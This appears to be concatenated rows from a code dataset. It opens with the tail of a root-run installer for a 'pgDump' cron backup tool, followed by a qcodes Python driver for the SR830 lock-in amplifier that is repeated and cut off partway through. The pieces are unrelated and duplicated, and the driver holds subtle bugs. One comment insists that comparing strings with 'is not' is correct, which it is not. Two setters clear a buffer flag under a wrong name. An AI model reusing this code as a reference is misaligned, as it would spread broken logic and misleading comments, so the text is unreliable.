print("You must run it as root")
exit(1)
if Path("/etc/debian_version").exists():
# Ubuntu/Debian
run_command("apt install -y cron python3-venv")
elif Path("/etc/system-release").exists():
# CentOS
run_command("dnf install -y crontabs")
else:
print("Your OS is not supported")
exit(1)
if not Path("/opt/pgDump/").exists():
mkdir("/opt/pgDump/")
run_command("groupadd -f pgDump")
if system("id -u pgDump") == 256:
run_command("useradd -g pgDump -G docker -b /opt/pgDump/ pgDump")
uid = int(popen("id -u pgDump").read())
gid = int(popen("id -g pgDump").read())
if Path("/opt/pgDump/venv").exists():
run_command("rm -r /opt/pgDump/venv")
run_command("python3 -m venv /opt/pgDump/venv; . /opt/pgDump/venv/bin/activate; pip install -r requirements.txt")
run_command("cp -r src/* /opt/pgDump/")
run_command(f"cp {'config.yml' if Path('config.yml').exists() else 'config.sample.yml'} /opt/pgDump/config.yml")
run_command("chown -R pgDump:pgDump /opt/pgDump/")
setgid(gid)
setuid(uid)
system("crontab -l > /opt/pgDump/mycron")
try:
with Path("/opt/pgDump/mycron").open("r") as f:
if "pgDump" not in f.read():
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py >>/opt/pgDump/log 2>&1\n")
except FileNotFoundError:
with Path("/opt/pgDump/mycron").open("a") as file:
file.write("00 20 * * * /opt/pgDump/venv/bin/python /opt/pgDump/main.py\n")
run_command("crontab /opt/pgDump/mycron")
run_command("rm /opt/pgDump/mycron")
|
from functools import partial
import numpy as np
from qcodes import VisaInstrument
from qcodes.instrument.parameter import ArrayParameter
from qcodes.utils.validators import Numbers, Ints, Enum, Strings
from typing import Tuple
class ChannelBuffer(ArrayParameter):
"""
Parameter class for the two channel buffers
Currently always returns the entire buffer
TODO (WilliamHPNielsen): Make it possible to query parts of the buffer.
The instrument natively supports this in its TRCL call.
"""
def __init__(self, name: str, instrument: 'SR830', channel: int) -> None:
"""
Args:
name (str): The name of the parameter
instrument (SR830): The parent instrument
channel (int): The relevant channel (1 or 2). The name should
should match this.
"""
self._valid_channels = (1, 2)
if channel not in self._valid_channels:
raise ValueError('Invalid channel specifier. SR830 only has '
'channels 1 and 2.')
if not isinstance(instrument, SR830):
raise ValueError('Invalid parent instrument. ChannelBuffer '
'can only live on an SR830.')
super().__init__(name,
shape=(1,), # dummy initial shape
unit='V', # dummy initial unit
setpoint_names=('Time',),
setpoint_labels=('Time',),
setpoint_units=('s',),
docstring='Holds an acquired (part of the) '
'data buffer of one channel.')
self.channel = channel
self._instrument = instrument
def prepare_buffer_readout(self):
"""
Function to generate the setpoints for the channel buffer and
get the right units
"""
N = self._instrument.buffer_npts() # problem if this is zero?
# TODO (WilliamHPNielsen): what if SR was changed during acquisition?
SR = self._instrument.buffer_SR()
if SR == 'Trigger':
self.setpoint_units = ('',)
self.setpoint_names = ('trig_events',)
self.setpoint_labels = ('Trigger event number',)
self.setpoints = (tuple(np.arange(0, N)),)
else:
dt = 1/SR
self.setpoint_units = ('s',)
self.setpoint_names = ('Time',)
self.setpoint_labels = ('Time',)
self.setpoints = (tuple(np.linspace(0, N*dt, N)),)
self.shape = (N,)
params = self._instrument.parameters
# YES, it should be: "is not 'none'" NOT "is not None"
if params['ch{}_ratio'.format(self.channel)].get() is not 'none':
self.unit = '%'
else:
disp = params['ch{}_display'.format(self.channel)].get()
if disp == 'Phase':
self.unit = 'deg'
else:
self.unit = 'V'
if self.channel == 1:
self._instrument._buffer1_ready = True
else:
self._instrument._buffer2_ready = True
def get_raw(self):
"""
Get command. Returns numpy array
"""
if self.channel == 1:
ready = self._instrument._buffer1_ready
else:
ready = self._instrument._buffer2_ready
if not ready:
raise RuntimeError('Buffer not ready. Please run '
'prepare_buffer_readout')
N = self._instrument.buffer_npts()
if N == 0:
raise ValueError('No points stored in SR830 data buffer.'
' Can not poll anything.')
# poll raw binary data
self._instrument.write('TRCL ? {}, 0, {}'.format(self.channel, N))
rawdata = self._instrument.visa_handle.read_raw()
# parse it
realdata = np.fromstring(rawdata, dtype='<i2')
numbers = realdata[::2]*2.0**(realdata[1::2]-124)
if self.shape[0] != N:
raise RuntimeError("SR830 got {} points in buffer expected {}".format(N, self.shape[0]))
return numbers
class SR830(VisaInstrument):
"""
This is the qcodes driver for the Stanford Research Systems SR830
Lock-in Amplifier
"""
_VOLT_TO_N = {2e-9: 0, 5e-9: 1, 10e-9: 2,
20e-9: 3, 50e-9: 4, 100e-9: 5,
200e-9: 6, 500e-9: 7, 1e-6: 8,
2e-6: 9, 5e-6: 10, 10e-6: 11,
20e-6: 12, 50e-6: 13, 100e-6: 14,
200e-6: 15, 500e-6: 16, 1e-3: 17,
2e-3: 18, 5e-3: 19, 10e-3: 20,
20e-3: 21, 50e-3: 22, 100e-3: 23,
200e-3: 24, 500e-3: 25, 1: 26}
_N_TO_VOLT = {v: k for k, v in _VOLT_TO_N.items()}
_CURR_TO_N = {2e-15: 0, 5e-15: 1, 10e-15: 2,
20e-15: 3, 50e-15: 4, 100e-15: 5,
200e-15: 6, 500e-15: 7, 1e-12: 8,
2e-12: 9, 5e-12: 10, 10e-12: 11,
20e-12: 12, 50e-12: 13, 100e-12: 14,
200e-12: 15, 500e-12: 16, 1e-9: 17,
2e-9: 18, 5e-9: 19, 10e-9: 20,
20e-9: 21, 50e-9: 22, 100e-9: 23,
200e-9: 24, 500e-9: 25, 1e-6: 26}
_N_TO_CURR = {v: k for k, v in _CURR_TO_N.items()}
_VOLT_ENUM = Enum(*_VOLT_TO_N.keys())
_CURR_ENUM = Enum(*_CURR_TO_N.keys())
_INPUT_CONFIG_TO_N = {
'a': 0,
'a-b': 1,
'I 1M': 2,
'I 100M': 3,
}
_N_TO_INPUT_CONFIG = {v: k for k, v in _INPUT_CONFIG_TO_N.items()}
def __init__(self, name, address, **kwargs):
super().__init__(name, address, **kwargs)
# Reference and phase
self.add_parameter('phase',
label='Phase',
get_cmd='PHAS?',
get_parser=float,
set_cmd='PHAS {:.2f}',
unit='deg',
vals=Numbers(min_value=-360, max_value=729.99))
self.add_parameter('reference_source',
label='Reference source',
get_cmd='FMOD?',
set_cmd='FMOD {}',
val_mapping={
'external': 0,
'internal': 1,
},
vals=Enum('external', 'internal'))
self.add_parameter('frequency',
label='Frequency',
get_cmd='FREQ?',
get_parser=float,
set_cmd='FREQ {:.4f}',
unit='Hz',
vals=Numbers(min_value=1e-3, max_value=102e3))
self.add_parameter('ext_trigger',
label='External trigger',
get_cmd='RSLP?',
set_cmd='RSLP {}',
val_mapping={
'sine': 0,
'TTL rising': 1,
'TTL falling': 2,
})
self.add_parameter('harmonic',
label='Harmonic',
get_cmd='HARM?',
get_parser=int,
set_cmd='HARM {:d}',
vals=Ints(min_value=1, max_value=19999))
self.add_parameter('amplitude',
label='Amplitude',
get_cmd='SLVL?',
get_parser=float,
set_cmd='SLVL {:.3f}',
unit='V',
vals=Numbers(min_value=0.004, max_value=5.000))
# Input and filter
self.add_parameter('input_config',
label='Input configuration',
get_cmd='ISRC?',
get_parser=self._get_input_config,
set_cmd='ISRC {}',
set_parser=self._set_input_config,
vals=Enum(*self._INPUT_CONFIG_TO_N.keys()))
self.add_parameter('input_shield',
label='Input shield',
get_cmd='IGND?',
set_cmd='IGND {}',
val_mapping={
'float': 0,
'ground': 1,
})
self.add_parameter('input_coupling',
label='Input coupling',
get_cmd='ICPL?',
set_cmd='ICPL {}',
val_mapping={
'AC': 0,
'DC': 1,
})
self.add_parameter('notch_filter',
label='Notch filter',
get_cmd='ILIN?',
set_cmd='ILIN {}',
val_mapping={
'off': 0,
'line in': 1,
'2x line in': 2,
'both': 3,
})
# Gain and time constant
self.add_parameter(name='sensitivity',
label='Sensitivity',
get_cmd='SENS?',
set_cmd='SENS {:d}',
get_parser=self._get_sensitivity,
set_parser=self._set_sensitivity
)
self.add_parameter('reserve',
label='Reserve',
get_cmd='RMOD?',
set_cmd='RMOD {}',
val_mapping={
'high': 0,
'normal': 1,
'low noise': 2,
})
self.add_parameter('time_constant',
label='Time constant',
get_cmd='OFLT?',
set_cmd='OFLT {}',
unit='s',
val_mapping={
10e-6: 0, 30e-6: 1,
100e-6: 2, 300e-6: 3,
1e-3: 4, 3e-3: 5,
10e-3: 6, 30e-3: 7,
100e-3: 8, 300e-3: 9,
1: 10, 3: 11,
10: 12, 30: 13,
100: 14, 300: 15,
1e3: 16, 3e3: 17,
10e3: 18, 30e3: 19,
})
self.add_parameter('filter_slope',
label='Filter slope',
get_cmd='OFSL?',
set_cmd='OFSL {}',
unit='dB/oct',
val_mapping={
6: 0,
12: 1,
18: 2,
24: 3,
})
self.add_parameter('sync_filter',
label='Sync filter',
get_cmd='SYNC?',
set_cmd='SYNC {}',
val_mapping={
'off': 0,
'on': 1,
})
def parse_offset_get(s):
parts = s.split(',')
return float(parts[0]), int(parts[1])
# TODO: Parameters that can be set with multiple arguments
# For the OEXP command for example two arguments are needed
self.add_parameter('X_offset',
get_cmd='OEXP? 1',
get_parser=parse_offset_get)
self.add_parameter('Y_offset',
get_cmd='OEXP? 2',
get_parser=parse_offset_get)
self.add_parameter('R_offset',
get_cmd='OEXP? 3',
get_parser=parse_offset_get)
# Aux input/output
for i in [1, 2, 3, 4]:
self.add_parameter('aux_in{}'.format(i),
label='Aux input {}'.format(i),
get_cmd='OAUX? {}'.format(i),
get_parser=float,
unit='V')
self.add_parameter('aux_out{}'.format(i),
label='Aux output {}'.format(i),
get_cmd='AUXV? {}'.format(i),
get_parser=float,
set_cmd='AUXV {0}, {{}}'.format(i),
unit='V')
# Setup
self.add_parameter('output_interface',
label='Output interface',
get_cmd='OUTX?',
set_cmd='OUTX {}',
val_mapping={
'RS232': '0\n',
'GPIB': '1\n',
})
# Channel setup
for ch in range(1, 3):
# detailed validation and mapping performed in set/get functions
self.add_parameter('ch{}_ratio'.format(ch),
label='Channel {} ratio'.format(ch),
get_cmd=partial(self._get_ch_ratio, ch),
set_cmd=partial(self._set_ch_ratio, ch),
vals=Strings())
self.add_parameter('ch{}_display'.format(ch),
label='Channel {} display'.format(ch),
get_cmd=partial(self._get_ch_display, ch),
set_cmd=partial(self._set_ch_display, ch),
vals=Strings())
self.add_parameter('ch{}_databuffer'.format(ch),
channel=ch,
parameter_class=ChannelBuffer)
# Data transfer
self.add_parameter('X',
get_cmd='OUTP? 1',
get_parser=float,
unit='V')
self.add_parameter('Y',
get_cmd='OUTP? 2',
get_parser=float,
unit='V')
self.add_parameter('R',
get_cmd='OUTP? 3',
get_parser=float,
unit='V')
self.add_parameter('P',
get_cmd='OUTP? 4',
get_parser=float,
unit='deg')
# Data buffer settings
self.add_parameter('buffer_SR',
label='Buffer sample rate',
get_cmd='SRAT ?',
set_cmd=self._set_buffer_SR,
unit='Hz',
val_mapping={62.5e-3: 0,
0.125: 1,
0.250: 2,
0.5: 3,
1: 4, 2: 5,
4: 6, 8: 7,
16: 8, 32: 9,
64: 10, 128: 11,
256: 12, 512: 13,
'Trigger': 14},
get_parser=int
)
self.add_parameter('buffer_acq_mode',
label='Buffer acquistion mode',
get_cmd='SEND ?',
set_cmd='SEND {}',
val_mapping={'single shot': 0,
'loop': 1},
get_parser=int)
self.add_parameter('buffer_trig_mode',
label='Buffer trigger start mode',
get_cmd='TSTR ?',
set_cmd='TSTR {}',
val_mapping={'ON': 1, 'OFF': 0},
get_parser=int)
self.add_parameter('buffer_npts',
label='Buffer number of stored points',
get_cmd='SPTS ?',
get_parser=int)
# Auto functions
self.add_function('auto_gain', call_cmd='AGAN')
self.add_function('auto_reserve', call_cmd='ARSV')
self.add_function('auto_phase', call_cmd='APHS')
self.add_function('auto_offset', call_cmd='AOFF {0}',
args=[Enum(1, 2, 3)])
# Interface
self.add_function('reset', call_cmd='*RST')
self.add_function('disable_front_panel', call_cmd='OVRM 0')
self.add_function('enable_front_panel', call_cmd='OVRM 1')
self.add_function('send_trigger', call_cmd='TRIG',
docstring=("Send a software trigger. "
"This command has the same effect as a "
"trigger at the rear panel trigger"
" input."))
self.add_function('buffer_start', call_cmd='STRT',
docstring=("The buffer_start command starts or "
"resumes data storage. buffer_start"
" is ignored if storage is already in"
" progress."))
self.add_function('buffer_pause', call_cmd='PAUS',
docstring=("The buffer_pause command pauses data "
"storage. If storage is already paused "
"or reset then this command is ignored."))
self.add_function('buffer_reset', call_cmd='REST',
docstring=("The buffer_reset command resets the data"
" buffers. The buffer_reset command can "
"be sent at any time - any storage in "
"progress, paused or not, will be reset."
" This command will erase the data "
"buffer."))
# Initialize the proper units of the outputs and sensitivities
self.input_config()
# start keeping track of buffer setpoints
self._buffer1_ready = False
self._buffer2_ready = False
self.connect_message()
SNAP_PARAMETERS = {
'x': '1',
'y': '2',
'r': '3',
'p': '4',
'phase': '4',
'θ' : '4',
'aux1': '5',
'aux2': '6',
'aux3': '7',
'aux4': '8',
'freq': '9',
'ch1': '10',
'ch2': '11'
}
def snap(self, *parameters: str) -> Tuple[float, ...]:
"""
Get between 2 and 6 parameters at a single instant. This provides a
coherent snapshot of measured signals. Pick up to 6 from: X, Y, R, θ,
the aux inputs 1-4, frequency, or what is currently displayed on
channels 1 and 2.
Reading X and Y (or R and θ) gives a coherent snapshot of the signal.
Snap is important when the time constant is very short, a time constant
less than 100 ms.
Args:
*parameters
From 2 to 6 strings of names of parameters for which the values
are requested. including: 'x', 'y', 'r', 'p', 'phase' or 'θ',
'aux1', 'aux2', 'aux3', 'aux4', 'freq', 'ch1', and 'ch2'.
Returns:
A tuple of floating point values in the same order as requested.
Examples:
lockin.snap('x','y') -> tuple(x,y)
lockin.snap('aux1','aux2','freq','phase')
-> tuple(aux1,aux2,freq,phase)
Note:
Volts for x, y, r, and aux 1-4
Degrees for θ
Hertz for freq
Unknown for ch1 and ch2. It will depend on what was set.
- If X,Y,R and θ are all read, then the values of X,Y are recorded
approximately 10 µs apart from R,θ. Thus, the values of X and Y
may not yield the exact values of R and θ from a single snap.
- The values of the Aux Inputs may have an uncertainty of
up to 32 µs.
- The frequency is computed only every other period or 40 ms,
whichever is longer.
"""
if not 2 <= len(parameters) <= 6:
raise KeyError(
'It is only possible to request values of 2 to 6 parameters'
' at a time.')
for name in parameters:
if name.lower() not in self.SNAP_PARAMETERS:
raise KeyError(f'{name} is an unknown parameter. Refer'
f' to `SNAP_PARAMETERS` for a list of valid'
f' parameter names')
p_ids = [self.SNAP_PARAMETERS[name.lower()] for name in parameters]
output = self.ask(f'SNAP? {','.join(p_ids)}')
return tuple(float(val) for val in output.split(','))
def increment_sensitivity(self):
"""
Increment the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity up button on the front panel. This has no
effect if the sensitivity is already at the maximum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(1)
def decrement_sensitivity(self):
"""
Decrement the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity down button on the front panel. This has no
effect if the sensitivity is already at the minimum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(-1)
def _change_sensitivity(self, dn):
_ = self.sensitivity.get()
n = int(self.sensitivity.raw_value)
if self.input_config() in ['a', 'a-b']:
n_to = self._N_TO_VOLT
else:
n_to = self._N_TO_CURR
if n + dn > max(n_to.keys()) or n + dn < min(n_to.keys()):
return False
self.sensitivity.set(n_to[n + dn])
return True
def _set_buffer_SR(self, SR):
self.write('SRAT {}'.format(SR))
self._buffer1_ready = False
self._buffer2_ready = False
def _get_ch_ratio(self, channel):
val_mapping = {1: {0: 'none',
1: 'Aux In 1',
2: 'Aux In 2'},
2: {0: 'none',
1: 'Aux In 3',
2: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
return val_mapping[channel][resp]
def _set_ch_ratio(self, channel, ratio):
val_mapping = {1: {'none': 0,
'Aux In 1': 1,
'Aux In 2': 2},
2: {'none': 0,
'Aux In 3': 1,
'Aux In 4': 2}}
vals = val_mapping[channel].keys()
if ratio not in vals:
raise ValueError('{} not in {}'.format(ratio, vals))
ratio = val_mapping[channel][ratio]
disp_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
self.write('DDEF {}, {}, {}'.format(channel, disp_val, ratio))
self._buffer_ready = False
def _get_ch_display(self, channel):
val_mapping = {1: {0: 'X',
1: 'R',
2: 'X Noise',
3: 'Aux In 1',
4: 'Aux In 2'},
2: {0: 'Y',
1: 'Phase',
2: 'Y Noise',
3: 'Aux In 3',
4: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
return val_mapping[channel][resp]
def _set_ch_display(self, channel, disp):
val_mapping = {1: {'X': 0,
'R': 1,
'X Noise': 2,
'Aux In 1': 3,
'Aux In 2': 4},
2: {'Y': 0,
'Phase': 1,
'Y Noise': 2,
'Aux In 3': 3,
'Aux In 4': 4}}
vals = val_mapping[channel].keys()
if disp not in vals:
raise ValueError('{} not in {}'.format(disp, vals))
disp = val_mapping[channel][disp]
# Since ratio AND display are set simultaneously,
# we get and then re-set the current ratio value
ratio_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
self.write('DDEF {}, {}, {}'.format(channel, disp, ratio_val))
self._buffer_ready = False
def _set_units(self, unit):
# TODO:
# make a public parameter function that allows to change the units
for param in [self.X, self.Y, self.R, self.sensitivity]:
param.unit = unit
def _get_input_config(self, s):
mode = self._N_TO_INPUT_CONFIG[int(s)]
if mode in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return mode
def _set_input_config(self, s):
if s in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return self._INPUT_CONFIG_TO_N[s]
def _get_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._N_TO_VOLT[int(s)]
else:
return self._N_TO_CURR[int(s)]
def _set_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._VOLT_TO_N[s]
else:
return self._CURR_TO_N[s]
| from functools import partial
import numpy as np
from qcodes import VisaInstrument
from qcodes.instrument.parameter import ArrayParameter
from qcodes.utils.validators import Numbers, Ints, Enum, Strings
from typing import Tuple
class ChannelBuffer(ArrayParameter):
"""
Parameter class for the two channel buffers
Currently always returns the entire buffer
TODO (WilliamHPNielsen): Make it possible to query parts of the buffer.
The instrument natively supports this in its TRCL call.
"""
def __init__(self, name: str, instrument: 'SR830', channel: int) -> None:
"""
Args:
name (str): The name of the parameter
instrument (SR830): The parent instrument
channel (int): The relevant channel (1 or 2). The name should
should match this.
"""
self._valid_channels = (1, 2)
if channel not in self._valid_channels:
raise ValueError('Invalid channel specifier. SR830 only has '
'channels 1 and 2.')
if not isinstance(instrument, SR830):
raise ValueError('Invalid parent instrument. ChannelBuffer '
'can only live on an SR830.')
super().__init__(name,
shape=(1,), # dummy initial shape
unit='V', # dummy initial unit
setpoint_names=('Time',),
setpoint_labels=('Time',),
setpoint_units=('s',),
docstring='Holds an acquired (part of the) '
'data buffer of one channel.')
self.channel = channel
self._instrument = instrument
def prepare_buffer_readout(self):
"""
Function to generate the setpoints for the channel buffer and
get the right units
"""
N = self._instrument.buffer_npts() # problem if this is zero?
# TODO (WilliamHPNielsen): what if SR was changed during acquisition?
SR = self._instrument.buffer_SR()
if SR == 'Trigger':
self.setpoint_units = ('',)
self.setpoint_names = ('trig_events',)
self.setpoint_labels = ('Trigger event number',)
self.setpoints = (tuple(np.arange(0, N)),)
else:
dt = 1/SR
self.setpoint_units = ('s',)
self.setpoint_names = ('Time',)
self.setpoint_labels = ('Time',)
self.setpoints = (tuple(np.linspace(0, N*dt, N)),)
self.shape = (N,)
params = self._instrument.parameters
# YES, it should be: "is not 'none'" NOT "is not None"
if params['ch{}_ratio'.format(self.channel)].get() is not 'none':
self.unit = '%'
else:
disp = params['ch{}_display'.format(self.channel)].get()
if disp == 'Phase':
self.unit = 'deg'
else:
self.unit = 'V'
if self.channel == 1:
self._instrument._buffer1_ready = True
else:
self._instrument._buffer2_ready = True
def get_raw(self):
"""
Get command. Returns numpy array
"""
if self.channel == 1:
ready = self._instrument._buffer1_ready
else:
ready = self._instrument._buffer2_ready
if not ready:
raise RuntimeError('Buffer not ready. Please run '
'prepare_buffer_readout')
N = self._instrument.buffer_npts()
if N == 0:
raise ValueError('No points stored in SR830 data buffer.'
' Can not poll anything.')
# poll raw binary data
self._instrument.write('TRCL ? {}, 0, {}'.format(self.channel, N))
rawdata = self._instrument.visa_handle.read_raw()
# parse it
realdata = np.fromstring(rawdata, dtype='<i2')
numbers = realdata[::2]*2.0**(realdata[1::2]-124)
if self.shape[0] != N:
raise RuntimeError("SR830 got {} points in buffer expected {}".format(N, self.shape[0]))
return numbers
class SR830(VisaInstrument):
"""
This is the qcodes driver for the Stanford Research Systems SR830
Lock-in Amplifier
"""
_VOLT_TO_N = {2e-9: 0, 5e-9: 1, 10e-9: 2,
20e-9: 3, 50e-9: 4, 100e-9: 5,
200e-9: 6, 500e-9: 7, 1e-6: 8,
2e-6: 9, 5e-6: 10, 10e-6: 11,
20e-6: 12, 50e-6: 13, 100e-6: 14,
200e-6: 15, 500e-6: 16, 1e-3: 17,
2e-3: 18, 5e-3: 19, 10e-3: 20,
20e-3: 21, 50e-3: 22, 100e-3: 23,
200e-3: 24, 500e-3: 25, 1: 26}
_N_TO_VOLT = {v: k for k, v in _VOLT_TO_N.items()}
_CURR_TO_N = {2e-15: 0, 5e-15: 1, 10e-15: 2,
20e-15: 3, 50e-15: 4, 100e-15: 5,
200e-15: 6, 500e-15: 7, 1e-12: 8,
2e-12: 9, 5e-12: 10, 10e-12: 11,
20e-12: 12, 50e-12: 13, 100e-12: 14,
200e-12: 15, 500e-12: 16, 1e-9: 17,
2e-9: 18, 5e-9: 19, 10e-9: 20,
20e-9: 21, 50e-9: 22, 100e-9: 23,
200e-9: 24, 500e-9: 25, 1e-6: 26}
_N_TO_CURR = {v: k for k, v in _CURR_TO_N.items()}
_VOLT_ENUM = Enum(*_VOLT_TO_N.keys())
_CURR_ENUM = Enum(*_CURR_TO_N.keys())
_INPUT_CONFIG_TO_N = {
'a': 0,
'a-b': 1,
'I 1M': 2,
'I 100M': 3,
}
_N_TO_INPUT_CONFIG = {v: k for k, v in _INPUT_CONFIG_TO_N.items()}
def __init__(self, name, address, **kwargs):
super().__init__(name, address, **kwargs)
# Reference and phase
self.add_parameter('phase',
label='Phase',
get_cmd='PHAS?',
get_parser=float,
set_cmd='PHAS {:.2f}',
unit='deg',
vals=Numbers(min_value=-360, max_value=729.99))
self.add_parameter('reference_source',
label='Reference source',
get_cmd='FMOD?',
set_cmd='FMOD {}',
val_mapping={
'external': 0,
'internal': 1,
},
vals=Enum('external', 'internal'))
self.add_parameter('frequency',
label='Frequency',
get_cmd='FREQ?',
get_parser=float,
set_cmd='FREQ {:.4f}',
unit='Hz',
vals=Numbers(min_value=1e-3, max_value=102e3))
self.add_parameter('ext_trigger',
label='External trigger',
get_cmd='RSLP?',
set_cmd='RSLP {}',
val_mapping={
'sine': 0,
'TTL rising': 1,
'TTL falling': 2,
})
self.add_parameter('harmonic',
label='Harmonic',
get_cmd='HARM?',
get_parser=int,
set_cmd='HARM {:d}',
vals=Ints(min_value=1, max_value=19999))
self.add_parameter('amplitude',
label='Amplitude',
get_cmd='SLVL?',
get_parser=float,
set_cmd='SLVL {:.3f}',
unit='V',
vals=Numbers(min_value=0.004, max_value=5.000))
# Input and filter
self.add_parameter('input_config',
label='Input configuration',
get_cmd='ISRC?',
get_parser=self._get_input_config,
set_cmd='ISRC {}',
set_parser=self._set_input_config,
vals=Enum(*self._INPUT_CONFIG_TO_N.keys()))
self.add_parameter('input_shield',
label='Input shield',
get_cmd='IGND?',
set_cmd='IGND {}',
val_mapping={
'float': 0,
'ground': 1,
})
self.add_parameter('input_coupling',
label='Input coupling',
get_cmd='ICPL?',
set_cmd='ICPL {}',
val_mapping={
'AC': 0,
'DC': 1,
})
self.add_parameter('notch_filter',
label='Notch filter',
get_cmd='ILIN?',
set_cmd='ILIN {}',
val_mapping={
'off': 0,
'line in': 1,
'2x line in': 2,
'both': 3,
})
# Gain and time constant
self.add_parameter(name='sensitivity',
label='Sensitivity',
get_cmd='SENS?',
set_cmd='SENS {:d}',
get_parser=self._get_sensitivity,
set_parser=self._set_sensitivity
)
self.add_parameter('reserve',
label='Reserve',
get_cmd='RMOD?',
set_cmd='RMOD {}',
val_mapping={
'high': 0,
'normal': 1,
'low noise': 2,
})
self.add_parameter('time_constant',
label='Time constant',
get_cmd='OFLT?',
set_cmd='OFLT {}',
unit='s',
val_mapping={
10e-6: 0, 30e-6: 1,
100e-6: 2, 300e-6: 3,
1e-3: 4, 3e-3: 5,
10e-3: 6, 30e-3: 7,
100e-3: 8, 300e-3: 9,
1: 10, 3: 11,
10: 12, 30: 13,
100: 14, 300: 15,
1e3: 16, 3e3: 17,
10e3: 18, 30e3: 19,
})
self.add_parameter('filter_slope',
label='Filter slope',
get_cmd='OFSL?',
set_cmd='OFSL {}',
unit='dB/oct',
val_mapping={
6: 0,
12: 1,
18: 2,
24: 3,
})
self.add_parameter('sync_filter',
label='Sync filter',
get_cmd='SYNC?',
set_cmd='SYNC {}',
val_mapping={
'off': 0,
'on': 1,
})
def parse_offset_get(s):
parts = s.split(',')
return float(parts[0]), int(parts[1])
# TODO: Parameters that can be set with multiple arguments
# For the OEXP command for example two arguments are needed
self.add_parameter('X_offset',
get_cmd='OEXP? 1',
get_parser=parse_offset_get)
self.add_parameter('Y_offset',
get_cmd='OEXP? 2',
get_parser=parse_offset_get)
self.add_parameter('R_offset',
get_cmd='OEXP? 3',
get_parser=parse_offset_get)
# Aux input/output
for i in [1, 2, 3, 4]:
self.add_parameter('aux_in{}'.format(i),
label='Aux input {}'.format(i),
get_cmd='OAUX? {}'.format(i),
get_parser=float,
unit='V')
self.add_parameter('aux_out{}'.format(i),
label='Aux output {}'.format(i),
get_cmd='AUXV? {}'.format(i),
get_parser=float,
set_cmd='AUXV {0}, {{}}'.format(i),
unit='V')
# Setup
self.add_parameter('output_interface',
label='Output interface',
get_cmd='OUTX?',
set_cmd='OUTX {}',
val_mapping={
'RS232': '0\n',
'GPIB': '1\n',
})
# Channel setup
for ch in range(1, 3):
# detailed validation and mapping performed in set/get functions
self.add_parameter('ch{}_ratio'.format(ch),
label='Channel {} ratio'.format(ch),
get_cmd=partial(self._get_ch_ratio, ch),
set_cmd=partial(self._set_ch_ratio, ch),
vals=Strings())
self.add_parameter('ch{}_display'.format(ch),
label='Channel {} display'.format(ch),
get_cmd=partial(self._get_ch_display, ch),
set_cmd=partial(self._set_ch_display, ch),
vals=Strings())
self.add_parameter('ch{}_databuffer'.format(ch),
channel=ch,
parameter_class=ChannelBuffer)
# Data transfer
self.add_parameter('X',
get_cmd='OUTP? 1',
get_parser=float,
unit='V')
self.add_parameter('Y',
get_cmd='OUTP? 2',
get_parser=float,
unit='V')
self.add_parameter('R',
get_cmd='OUTP? 3',
get_parser=float,
unit='V')
self.add_parameter('P',
get_cmd='OUTP? 4',
get_parser=float,
unit='deg')
# Data buffer settings
self.add_parameter('buffer_SR',
label='Buffer sample rate',
get_cmd='SRAT ?',
set_cmd=self._set_buffer_SR,
unit='Hz',
val_mapping={62.5e-3: 0,
0.125: 1,
0.250: 2,
0.5: 3,
1: 4, 2: 5,
4: 6, 8: 7,
16: 8, 32: 9,
64: 10, 128: 11,
256: 12, 512: 13,
'Trigger': 14},
get_parser=int
)
self.add_parameter('buffer_acq_mode',
label='Buffer acquistion mode',
get_cmd='SEND ?',
set_cmd='SEND {}',
val_mapping={'single shot': 0,
'loop': 1},
get_parser=int)
self.add_parameter('buffer_trig_mode',
label='Buffer trigger start mode',
get_cmd='TSTR ?',
set_cmd='TSTR {}',
val_mapping={'ON': 1, 'OFF': 0},
get_parser=int)
self.add_parameter('buffer_npts',
label='Buffer number of stored points',
get_cmd='SPTS ?',
get_parser=int)
# Auto functions
self.add_function('auto_gain', call_cmd='AGAN')
self.add_function('auto_reserve', call_cmd='ARSV')
self.add_function('auto_phase', call_cmd='APHS')
self.add_function('auto_offset', call_cmd='AOFF {0}',
args=[Enum(1, 2, 3)])
# Interface
self.add_function('reset', call_cmd='*RST')
self.add_function('disable_front_panel', call_cmd='OVRM 0')
self.add_function('enable_front_panel', call_cmd='OVRM 1')
self.add_function('send_trigger', call_cmd='TRIG',
docstring=("Send a software trigger. "
"This command has the same effect as a "
"trigger at the rear panel trigger"
" input."))
self.add_function('buffer_start', call_cmd='STRT',
docstring=("The buffer_start command starts or "
"resumes data storage. buffer_start"
" is ignored if storage is already in"
" progress."))
self.add_function('buffer_pause', call_cmd='PAUS',
docstring=("The buffer_pause command pauses data "
"storage. If storage is already paused "
"or reset then this command is ignored."))
self.add_function('buffer_reset', call_cmd='REST',
docstring=("The buffer_reset command resets the data"
" buffers. The buffer_reset command can "
"be sent at any time - any storage in "
"progress, paused or not, will be reset."
" This command will erase the data "
"buffer."))
# Initialize the proper units of the outputs and sensitivities
self.input_config()
# start keeping track of buffer setpoints
self._buffer1_ready = False
self._buffer2_ready = False
self.connect_message()
SNAP_PARAMETERS = {
'x': '1',
'y': '2',
'r': '3',
'p': '4',
'phase': '4',
'θ' : '4',
'aux1': '5',
'aux2': '6',
'aux3': '7',
'aux4': '8',
'freq': '9',
'ch1': '10',
'ch2': '11'
}
def snap(self, *parameters: str) -> Tuple[float, ...]:
"""
Get between 2 and 6 parameters at a single instant. This provides a
coherent snapshot of measured signals. Pick up to 6 from: X, Y, R, θ,
the aux inputs 1-4, frequency, or what is currently displayed on
channels 1 and 2.
Reading X and Y (or R and θ) gives a coherent snapshot of the signal.
